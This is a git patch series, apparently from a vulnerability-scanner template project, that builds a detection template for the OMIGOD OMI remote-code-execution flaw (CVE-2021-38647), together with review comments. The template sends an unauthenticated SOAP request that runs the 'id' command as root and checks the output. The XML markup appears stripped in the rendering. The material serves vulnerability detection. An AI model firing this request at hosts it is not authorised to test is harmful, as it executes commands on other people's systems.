From 03aa89e4de33174f1032fdd4cffa3ddb1b2a291c Mon Sep 17 00:00:00 2001
From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com>
Date: Wed, 15 Sep 2021 23:10:58 +0700
Subject: [PATCH 1/7] Create CVE-2021-38647.yaml
---
cves/2021/CVE-2021-38647.yaml | 57 +++++++++++++++++++++++++++++++++++
1 file changed, 57 insertions(+)
create mode 100644 cves/2021/CVE-2021-38647.yaml
diff --git a/cves/2021/CVE-2021-38647.yaml b/cves/2021/CVE-2021-38647.yaml
new file mode 100644
index 0000000000..4c499f0b8a
--- /dev/null
+++ b/cves/2021/CVE-2021-38647.yaml
@@ -0,0 +1,57 @@
+id: CVE-2021-38647
+
+info:
+ name: Open Management Infrastructure Remote Code Execution Vulnerability
+ author: daffainfo
+ severity: critical
+ tags: cve,cve2021,rce,omi
+ reference:
+ - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure
+ - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647
+
+requests:
+
+ - raw:
+ - |
+ POST /wsman HTTP/1.1
+ Connection: Keep-Alive
+ Content-Length: 1505
+ Content-Type: application/soap+xml;charset=UTF-8
+ Host: {{Hostname}}
+
+
+
+ HTTP://192.168.1.1:5986/wsman/
+ http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem
+
+ http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
+
+ http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteShellCommand
+ 102400
+ uuid:0AB58087-C2C3-0005-0000-000000010000
+ PT1M30S
+
+
+
+
+ root/scx
+
+
+
+
+ id
+ 0
+
+
+
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "uid=0(root) gid=0(root) groups=0(root)"
+ part: body
+
+ - type: status
+ status:
+ - 200
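Review bot: `Content-Length: 1505` on the raw request is a hand-computed literal, so any edit to the SOAP body desynchronises the framing unless nuclei recomputes the header; this stops being theoretical in PATCH 2 and PATCH 3, where the To value becomes `{{Hostname}}{{Path}}` and then `{{BaseURL}}/wsman/` and the body length varies per target. Drop the line and let the HTTP client set the length. The SOAP element tags are not visible in the hunk as rendered here — only element text such as `root/scx`, `102400` and `id` survives — which looks like an extraction artifact, but the committed file should be checked for well-formed envelope markup. The request executes a command on the target (`ExecuteShellCommand` with `id`), so the `info` block should say so in a `description`, so that operators running the template fleet-wide know a hit means a command ran on the host.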
From f168c83b4405f4d18d870d6072757aef200da1b1 Mon Sep 17 00:00:00 2001
From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com>
Date: Wed, 15 Sep 2021 23:16:39 +0700
Subject: [PATCH 2/7] Update CVE-2021-38647.yaml
---
cves/2021/CVE-2021-38647.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cves/2021/CVE-2021-38647.yaml b/cves/2021/CVE-2021-38647.yaml
index 4c499f0b8a..db7f42b46b 100644
--- a/cves/2021/CVE-2021-38647.yaml
+++ b/cves/2021/CVE-2021-38647.yaml
@@ -21,7 +21,7 @@ requests:
- HTTP://192.168.1.1:5986/wsman/
+ HTTP://{{Hostname}}{{Path}}/
http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
From a7fbdb10ae62029d086c556d4585bc8112b0c89a Mon Sep 17 00:00:00 2001
From: sandeep
Date: Wed, 15 Sep 2021 22:00:09 +0530
Subject: [PATCH 3/7] misc update - WIP
---
cves/2021/CVE-2021-38647.yaml | 6 ++++--
1 file changed, 4 insertions(+), 2 deletions(-)
diff --git a/cves/2021/CVE-2021-38647.yaml b/cves/2021/CVE-2021-38647.yaml
index db7f42b46b..6facae24aa 100644
--- a/cves/2021/CVE-2021-38647.yaml
+++ b/cves/2021/CVE-2021-38647.yaml
@@ -1,13 +1,15 @@
id: CVE-2021-38647
info:
- name: Open Management Infrastructure Remote Code Execution Vulnerability
+ name: OMIGOD - Open Management Infrastructure RCE
author: daffainfo
severity: critical
tags: cve,cve2021,rce,omi
reference:
- https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647
+ - https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647
+ - https://github.com/microsoft/omi
requests:
@@ -21,7 +23,7 @@ requests:
- HTTP://{{Hostname}}{{Path}}/
+ {{BaseURL}}/wsman/
http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
From 6eed1c1f296d98fe95344ad06efc5738d80ef4bf Mon Sep 17 00:00:00 2001
From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com>
Date: Fri, 17 Sep 2021 05:49:53 +0700
Subject: [PATCH 4/7] Update CVE-2021-38647.yaml
---
cves/2021/CVE-2021-38647.yaml | 1 +
1 file changed, 1 insertion(+)
diff --git a/cves/2021/CVE-2021-38647.yaml b/cves/2021/CVE-2021-38647.yaml
index 6facae24aa..30a8785d89 100644
--- a/cves/2021/CVE-2021-38647.yaml
+++ b/cves/2021/CVE-2021-38647.yaml
@@ -3,6 +3,7 @@ id: CVE-2021-38647
info:
name: OMIGOD - Open Management Infrastructure RCE
author: daffainfo
+ description: Unauthenticated RCE vulnerability in the Open Management Infrastructure by removing authentication header
severity: critical
tags: cve,cve2021,rce,omi
reference:
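Review bot: The new `description` is phrased as a recipe ("by removing authentication header") rather than as a statement of the weakness, and it does not tell the operator that this template is intrusive — the request body in the file invokes ExecuteShellCommand with `id`, and the matcher asserts `uid=0(root)`, so a match means a command ran as root on the host. I would write it as `description: Unauthenticated remote code execution in Open Management Infrastructure (OMI) - the /wsman listener processes requests that carry no Authorization header and runs them as root. This template is intrusive and executes the id command on the target to confirm.` The references and `severity: critical` can stay as they are.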
From b9cb5a8d720b434aab117fa3738e72dbd91a36c4 Mon Sep 17 00:00:00 2001
From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com>
Date: Fri, 17 Sep 2021 12:56:55 +0700
Subject: [PATCH 5/7] Update CVE-2021-38647.yaml
---
cves/2021/CVE-2021-38647.yaml | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/cves/2021/CVE-2021-38647.yaml b/cves/2021/CVE-2021-38647.yaml
index 30a8785d89..9ebc3f374c 100644
--- a/cves/2021/CVE-2021-38647.yaml
+++ b/cves/2021/CVE-2021-38647.yaml
@@ -10,6 +10,7 @@ info:
- https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647
- https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647
+ - https://censys.io/blog/understanding-the-impact-of-omigod-cve-2021-38647/
- https://github.com/microsoft/omi
requests:
@@ -52,7 +53,7 @@ requests:
matchers:
- type: word
words:
- - "uid=0(root) gid=0(root) groups=0(root)"
+ - "uid=0(root) gid=0(root) groups=0(root)"
part: body
- type: status
From e26a1bb759ee26ce5a10a9f235c742a2ce775267 Mon Sep 17 00:00:00 2001
From: sandeep
Date: Fri, 17 Sep 2021 13:42:22 +0530
Subject: [PATCH 6/7] misc update
---
cves/2021/CVE-2021-38647.yaml | 81 ++++++++++++++++++-----------------
1 file changed, 42 insertions(+), 39 deletions(-)
diff --git a/cves/2021/CVE-2021-38647.yaml b/cves/2021/CVE-2021-38647.yaml
index 9ebc3f374c..ab7069b79b 100644
--- a/cves/2021/CVE-2021-38647.yaml
+++ b/cves/2021/CVE-2021-38647.yaml
@@ -2,10 +2,10 @@ id: CVE-2021-38647
info:
name: OMIGOD - Open Management Infrastructure RCE
- author: daffainfo
- description: Unauthenticated RCE vulnerability in the Open Management Infrastructure by removing authentication header
+ author: daffainfo,xstp
severity: critical
- tags: cve,cve2021,rce,omi
+ tags: cve,cve2021,rce,omi,microsoft
+ description: Open Management Infrastructure Remote Code Execution Vulnerability
reference:
- https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647
@@ -14,48 +14,51 @@ info:
- https://github.com/microsoft/omi
requests:
-
- raw:
- |
POST /wsman HTTP/1.1
- Connection: Keep-Alive
- Content-Length: 1505
- Content-Type: application/soap+xml;charset=UTF-8
Host: {{Hostname}}
-
-
-
- {{BaseURL}}/wsman/
- http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem
-
- http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
-
- http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteShellCommand
- 102400
- uuid:0AB58087-C2C3-0005-0000-000000010000
- PT1M30S
-
-
-
-
- root/scx
-
-
-
-
- id
- 0
-
-
+ Content-Type: application/soap+xml;charset=UTF-8
+
+
+
+ HTTP://127.0.0.1:5985/wsman/
+ http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem
+
+ http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
+
+ http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript
+ 102400
+ uuid:00B60932-CC01-0005-0000-000000010000
+ PT1M30S
+
+
+
+
+ root/scx
+
+
+
+
+ aWQ=
+
+ 0
+ true
+
+
- matchers-condition: and
matchers:
- type: word
words:
- - "uid=0(root) gid=0(root) groups=0(root)"
- part: body
-
- - type: status
- status:
- - 200
+ - ''
+ - 'uid=0(root) gid=0(root) groups=0'
+ condition: and
\ No newline at end of file
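Review bot: The rewritten matcher lists `''` as its first word (the `- ''` line); if that really is an empty string, a word matcher on it is satisfied by every body and the `condition: and` reduces to the single `uid=0(root) gid=0(root) groups=0` check, while the old `status` matcher is gone too, so the template now fires on any response that echoes the string. It looks more likely that an XML element string was stripped when this patch was rendered, so confirm the committed file carries the intended marker and otherwise drop the empty entry. The file also ends without a newline (`\ No newline at end of file`), which yamllint flags; add the trailing newline. Switching the action to ExecuteScript with the base64 payload `aWQ=` (`id`) keeps the check intrusive, so the `description` in `info` — rewritten in the first hunk of this patch to the generic MSRC title — should still say that a command is executed on the target.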
From 728e36a99dfcc34cef6267b3e1432adfbc2aa382 Mon Sep 17 00:00:00 2001
From: sandeep
Date: Fri, 17 Sep 2021 13:42:40 +0530
Subject: [PATCH 7/7] Update CVE-2021-38647.yaml
---
cves/2021/CVE-2021-38647.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cves/2021/CVE-2021-38647.yaml b/cves/2021/CVE-2021-38647.yaml
index ab7069b79b..dbc79e1595 100644
--- a/cves/2021/CVE-2021-38647.yaml
+++ b/cves/2021/CVE-2021-38647.yaml
@@ -19,7 +19,7 @@ requests:
POST /wsman HTTP/1.1
Host: {{Hostname}}
Content-Type: application/soap+xml;charset=UTF-8
-
+